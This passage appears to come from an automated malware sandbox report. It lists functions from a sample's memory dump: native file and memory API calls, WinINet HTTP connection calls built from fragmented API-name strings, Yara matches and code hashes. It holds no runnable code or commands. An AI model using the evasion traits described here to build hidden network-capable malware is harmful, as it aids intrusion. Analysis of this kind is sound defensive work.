                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,03053B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03053B87,007A002E,00000000,00000060,00000000,00000000), ref: 030581FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: .z`
                                                        • API String ID: 823142352-1441809116
                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                        • Instruction ID: 36e60c74e462bbeb432980ae3133c405137f46ca90cca0d8b98f930d6b9218e8
                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                        • Instruction Fuzzy Hash: D3F0B2B2201208ABCB08CF88DC84EEB77EDAF8C754F158248BA0D97240C630E8118BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0305825D, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtReadFile.NTDLL(03053D42,5E972F59,FFFFFFFF,03053A01,?,?,03053D42,?,03053A01,FFFFFFFF,5E972F59,03053D42,?,00000000), ref: 030582A5
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 563a4cf231d250379c240eaa5ed74fad4c220c5eaec2504c1f258116cdab191c
                                                        • Instruction ID: b1fc5c026124a7f2c6868cd56c026f4e4697345d1bb39bb0fef37ae1c86c29fc
                                                        • Opcode Fuzzy Hash: 563a4cf231d250379c240eaa5ed74fad4c220c5eaec2504c1f258116cdab191c
                                                        • Instruction Fuzzy Hash: 56F0A9B6200108AFCB18DF89DC91DEB77A9EF8C754F158259FE1D97241D630E915CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03058260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtReadFile.NTDLL(03053D42,5E972F59,FFFFFFFF,03053A01,?,?,03053D42,?,03053A01,FFFFFFFF,5E972F59,03053D42,?,00000000), ref: 030582A5
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                        • Instruction ID: a030797fba23793725b84f29280fa93c18c3a3f0849101d4a715c2f10162df4d
                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                        • Instruction Fuzzy Hash: 09F0A4B6200208ABCB14DF89DC80EEB77ADAF8C754F158248BE1D97241DA30E8118BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03058390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03042D11,00002000,00003000,00000004), ref: 030583C9
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                        • Instruction ID: 63249d02d15de4e03c343fef27d671a2fd5c29c02319703e38650d76263866b6
                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                        • Instruction Fuzzy Hash: C6F015B6200208ABCB14DF89CC80EEB77ADAF88650F118148BE0897241C630F810CBF0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0305838C, Relevance: 1.5, APIs: 1, Instructions: 27memorynativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03042D11,00002000,00003000,00000004), ref: 030583C9
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: 78b5cdf9c956650e1a2bf89ad08e1f38da983ca164334b8f2d1a485a888d1f3a
                                                        • Instruction ID: 7c66e14c5b5b3bfa092b2116c64cbc757c0edd8957055d8dfa4b0f73b1a35faf
                                                        • Opcode Fuzzy Hash: 78b5cdf9c956650e1a2bf89ad08e1f38da983ca164334b8f2d1a485a888d1f3a
                                                        • Instruction Fuzzy Hash: 40F065B5215145ABCB15DF58DC80CE77BADBF88220B158659FD4C9B212CA34E814CBF0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 030582E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtClose.NTDLL(03053D20,?,?,03053D20,00000000,FFFFFFFF), ref: 03058305
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                        • Instruction ID: 02647eb4ca202790024488b43075c7c5091465e36ec483464c3189742e49d212
                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                        • Instruction Fuzzy Hash: 60D012762003146BD710EF98CC45ED7779CEF44650F154455BE185B241C530F90086E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04819840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 0dac0c8b877e916affee5f4715fdcd016fc38b1cb5f2a099e733d1be50db54e5
                                                        • Instruction ID: e542be1b67597c83085e37f0b28c7ba4049bbf5e8b60fc7a9667be33234479a2
                                                        • Opcode Fuzzy Hash: 0dac0c8b877e916affee5f4715fdcd016fc38b1cb5f2a099e733d1be50db54e5
                                                        • Instruction Fuzzy Hash: 03900261242051527545B15945045074446A7E02957E1C512A6409A60C8566E89AE661
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04819860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 62c9b7317e1217bf9dfa6bf68e22abad5670f1b1d8d28667b01aa3cf25a18eeb
                                                        • Instruction ID: 9f3c592be1e7eb164b578ad31fb0c06d382d6eb2141fc11740b4249875900e56
                                                        • Opcode Fuzzy Hash: 62c9b7317e1217bf9dfa6bf68e22abad5670f1b1d8d28667b01aa3cf25a18eeb
                                                        • Instruction Fuzzy Hash: C290027120101413F11161594604707044997D0295FE1C912A5419668D9696D996B161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: c085167e933ca86e12b812cff255eddd2d623e57a7f070d5b14b85365a57864e
                                                        • Instruction ID: 94f8b7d4bb199b03ec19136eb3b5f8243726390970115104549fd6630bf6d93d
                                                        • Opcode Fuzzy Hash: c085167e933ca86e12b812cff255eddd2d623e57a7f070d5b14b85365a57864e
                                                        • Instruction Fuzzy Hash: AF9002A134101442F10061594514B060445D7E1355FA1C515E6059664D8659DC967166
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 1b1b7268c5e3e27f670278e5a7583dc764abe2835f2850c3eb685b93b76c0e96
                                                        • Instruction ID: a29e2196719eb33bd3db768f1cd9747971a87079e5211812ebb39e448a1f08b5
                                                        • Opcode Fuzzy Hash: 1b1b7268c5e3e27f670278e5a7583dc764abe2835f2850c3eb685b93b76c0e96
                                                        • Instruction Fuzzy Hash: 769002A120201003610571594514616444A97E0255BA1C521E60096A0DC565D8D57165
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04819910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a7820f5650e896fb389ec1b8fea5d0acfe9f2c083cfde43f5b14e30b8dfd71ec
                                                        • Instruction ID: f7d279f56c5a63fc65732ab2e63f921764696d1cc1ccc0faf045e97779535bc0
                                                        • Opcode Fuzzy Hash: a7820f5650e896fb389ec1b8fea5d0acfe9f2c083cfde43f5b14e30b8dfd71ec
                                                        • Instruction Fuzzy Hash: 829002B120101402F14071594504746044597D0355FA1C511AA059664E8699DDD976A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04819540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 0f1eec790b18c4fd3b1486500841f8df4103d0cfb2a7ae50ac23760528819c41
                                                        • Instruction ID: 4e1b60a2c1dad3b8e73c51067813af64e24f19c04c43b844eb89f55063e88234
                                                        • Opcode Fuzzy Hash: 0f1eec790b18c4fd3b1486500841f8df4103d0cfb2a7ae50ac23760528819c41
                                                        • Instruction Fuzzy Hash: E9900265211010032105A5590704507048697D53A53A1C521F600A660CD661D8A56161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048196D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3bfd5a877cc7729ad5b348e06a1fa5b3ee21b4cdc9d642b67825700635e77fd7
                                                        • Instruction ID: 16d66b66a9484bdedd1cc84b7572999de48fb47e3459b90b61d519f85d6592ff
                                                        • Opcode Fuzzy Hash: 3bfd5a877cc7729ad5b348e06a1fa5b3ee21b4cdc9d642b67825700635e77fd7
                                                        • Instruction Fuzzy Hash: 0690027120101842F10061594504B46044597E0355FA1C516A5119764D8655D8957561
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 921be2ff102d1fa58dcad72256339cd7826e624510ab75856d1d3e971ecef2b2
                                                        • Instruction ID: d1f50eb3be6df1b97d14649941eb263de2584539cb8861207323f787d86cfb7a
                                                        • Opcode Fuzzy Hash: 921be2ff102d1fa58dcad72256339cd7826e624510ab75856d1d3e971ecef2b2
                                                        • Instruction Fuzzy Hash: 4E90027120109802F1106159850474A044597D0355FA5C911A9419768D86D5D8D57161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04819650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: c98602790b3133c91203a1b9a74dcac1d06e957b8b4b8c81b83dcd4920588d2f
                                                        • Instruction ID: 2be44b35b1df27372c6e7d1de79dca4735d298ef5bce925eeb474b3ee7e16d46
                                                        • Opcode Fuzzy Hash: c98602790b3133c91203a1b9a74dcac1d06e957b8b4b8c81b83dcd4920588d2f
                                                        • Instruction Fuzzy Hash: 8890027120505842F14071594504A46045597D0359FA1C511A50597A4D9665DD99B6A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04819A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 906129c82c5066c9fe2c4ede9f2db3c514189b2057dc3718b0a7d8f8de8c0c27
                                                        • Instruction ID: 7bec9b49c6d6b04cbbbd900776accfa9e9e1efd1d2317cf7f32a258c895c1a1e
                                                        • Opcode Fuzzy Hash: 906129c82c5066c9fe2c4ede9f2db3c514189b2057dc3718b0a7d8f8de8c0c27
                                                        • Instruction Fuzzy Hash: 1A90026121181042F20065694D14B07044597D0357FA1C615A5149664CC955D8A56561
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04819660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a27c762286cef368891c33d632d0a520b2d704ef1c7953c4701c82da7661dc63
                                                        • Instruction ID: 59c4ef3ecdd3fefd5c13a2b3b759699b515095dc8d6fd0c9329b9d6e4db3548d
                                                        • Opcode Fuzzy Hash: a27c762286cef368891c33d632d0a520b2d704ef1c7953c4701c82da7661dc63
                                                        • Instruction Fuzzy Hash: 5590027120101802F1807159450464A044597D1355FE1C515A501A764DCA55DA9D77E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04819780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: e4aac227b9a5c617037c7c46fe753245e01e1fe3aad0435acc2d85558e141b9a
                                                        • Instruction ID: b51027e5e6b81f7a06662e3f8372de7de371a30b6080f3ced9121b834a333592
                                                        • Opcode Fuzzy Hash: e4aac227b9a5c617037c7c46fe753245e01e1fe3aad0435acc2d85558e141b9a
                                                        • Instruction Fuzzy Hash: CC90026921301002F1807159550860A044597D1256FE1D915A500A668CC955D8AD6361
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04819FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: c204b91b851a173a8e66447c020f99331c45e8d063585dc8dcf3cea6c0683d9e
                                                        • Instruction ID: 0f25a1f1dd404b78007337b053179e6a1c8071631c5540160c4a4f5863401b5d
                                                        • Opcode Fuzzy Hash: c204b91b851a173a8e66447c020f99331c45e8d063585dc8dcf3cea6c0683d9e
                                                        • Instruction Fuzzy Hash: E490027131115402F11061598504706044597D1255FA1C911A5819668D86D5D8D57162
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04819710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 27d56ba680642ab174b4fd1ccd531f0233c54e6bac89c11a580a61f773f9ba26
                                                        • Instruction ID: 5c4e79f5649f14ada9ba8f30e3e0e2583ddd892aee00d4c01090353bb65a802b
                                                        • Opcode Fuzzy Hash: 27d56ba680642ab174b4fd1ccd531f0233c54e6bac89c11a580a61f773f9ba26
                                                        • Instruction Fuzzy Hash: BF90027120101402F10065995508646044597E0355FA1D511AA019665EC6A5D8D57171
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 030588B8, Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 103networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 030588A8
                                                        • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 03058928
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ConnectHttpInternetOpenRequest
                                                        • String ID: ConnectA$HttpOpenRequestA$HttpOpenRequestA$HttpSendRequestA$InternetConnectA$Open$OpenRequestA$Requ$Requ$RequestA$RequestA$SendRequestA$estA$estA$rnetConnectA
                                                        • API String ID: 1341064763-2966683610
                                                        • Opcode ID: 679bdad0e9d6cb016a46a8f1a9cfefa80f961451f8ee4ec149b1973d96422f49
                                                        • Instruction ID: 9b974f72a606b173f19ff1c0140a6860de4287069fba55cc8b23cb1f9ec30a06
                                                        • Opcode Fuzzy Hash: 679bdad0e9d6cb016a46a8f1a9cfefa80f961451f8ee4ec149b1973d96422f49
                                                        • Instruction Fuzzy Hash: CB311BB2A05159AFCB14DF88D881DEB77BDEB98610F198589FD48A7304D630ED10CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 030588C0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 03058928
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: HttpOpenRequest
                                                        • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                        • API String ID: 1984915467-4016285707
                                                        • Opcode ID: 4629f0b62c9d62aa869026d383fb100c5c864a916371698f5582dc584791c3be
                                                        • Instruction ID: 584ee1a11b1051c15c0d3a3918159fb739ca7f0db310744181b24348ad410ad8
                                                        • Opcode Fuzzy Hash: 4629f0b62c9d62aa869026d383fb100c5c864a916371698f5582dc584791c3be
                                                        • Instruction Fuzzy Hash: EA01E9B6A05118AFCB14DF98D841DEF7BB9EB48210F158288FD49A7204D630ED10CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03058840, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 030588A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ConnectInternet
                                                        • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                        • API String ID: 3050416762-1024195942
                                                        • Opcode ID: adccd6fb8208d3c98e30e6bf2d4e9020a6f59a09b06b882a48730a827695da45
                                                        • Instruction ID: d29bf66ec3bf0ef830ff289717ab091cd2622fe39c4514774761f7d857bdb92e
                                                        • Opcode Fuzzy Hash: adccd6fb8208d3c98e30e6bf2d4e9020a6f59a09b06b882a48730a827695da45
                                                        • Instruction Fuzzy Hash: 9201EDB2915118AFCB14DF99D941EEF77B9EB48210F158289BE08A7240D630EE10CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 030587D0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 03058827
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InternetOpen
                                                        • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                        • API String ID: 2038078732-3155091674
                                                        • Opcode ID: f213af7ae318c5dbdd983d388aa7fc33bc70a64f7f57c657f26ef412a9e514a6
                                                        • Instruction ID: 5614c86e57ebd2b4e60fb854b8528f3ed88d4cc72dbe4f848b0c07f38f7f400b
                                                        • Opcode Fuzzy Hash: f213af7ae318c5dbdd983d388aa7fc33bc70a64f7f57c657f26ef412a9e514a6
                                                        • Instruction Fuzzy Hash: 84F01DB6A01218AF8B14DF98DC419FBB7B8EF48210B048589BD18A7201D631AA10CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03058A20, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 34networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 03058A6F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandleInternet
                                                        • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                        • API String ID: 1081599783-4067651292
                                                        • Opcode ID: 521e9984fccd3d6f5e7a12ef66d8ce49e7e9bc9f22783afe8bf911bf4d7e7b2f
                                                        • Instruction ID: 6ec4936eb26e50c03a0855f0af4d601847b767ac7ccf6383068653d4045a13c7
                                                        • Opcode Fuzzy Hash: 521e9984fccd3d6f5e7a12ef66d8ce49e7e9bc9f22783afe8bf911bf4d7e7b2f
                                                        • Instruction Fuzzy Hash: C4F03672D051189F8B10DFD9D9459EFBBB8EB44210F148189ED486B201D6709B10CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03058A17, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 31networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 03058A6F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandleInternet
                                                        • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                        • API String ID: 1081599783-4067651292
                                                        • Opcode ID: bdc7fb0e4c04770de1dd2274dd29e3c5ca4b7a7b3cca02109fda390470df7328
                                                        • Instruction ID: 567ec0ba612b6835718eddd653b01904fb4dc9c99a7bf0d3fdc336d52fcb5c9b
                                                        • Opcode Fuzzy Hash: bdc7fb0e4c04770de1dd2274dd29e3c5ca4b7a7b3cca02109fda390470df7328
                                                        • Instruction Fuzzy Hash: 1AF01DB2D01228AF8B01DFD9D945ADEBBB5FF44310F118189EE086B205E6709B10CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03056ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 03056F78
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        • Opcode ID: c81b407c693f4db60720d769cb88c20b4502e8cb402b75421e589a9de1d0dbc4
                                                        • Instruction ID: 7be6ffe1d0fe9c1e02812a7866ef5cc877afc272ac53a33f589da655cb85ec6b
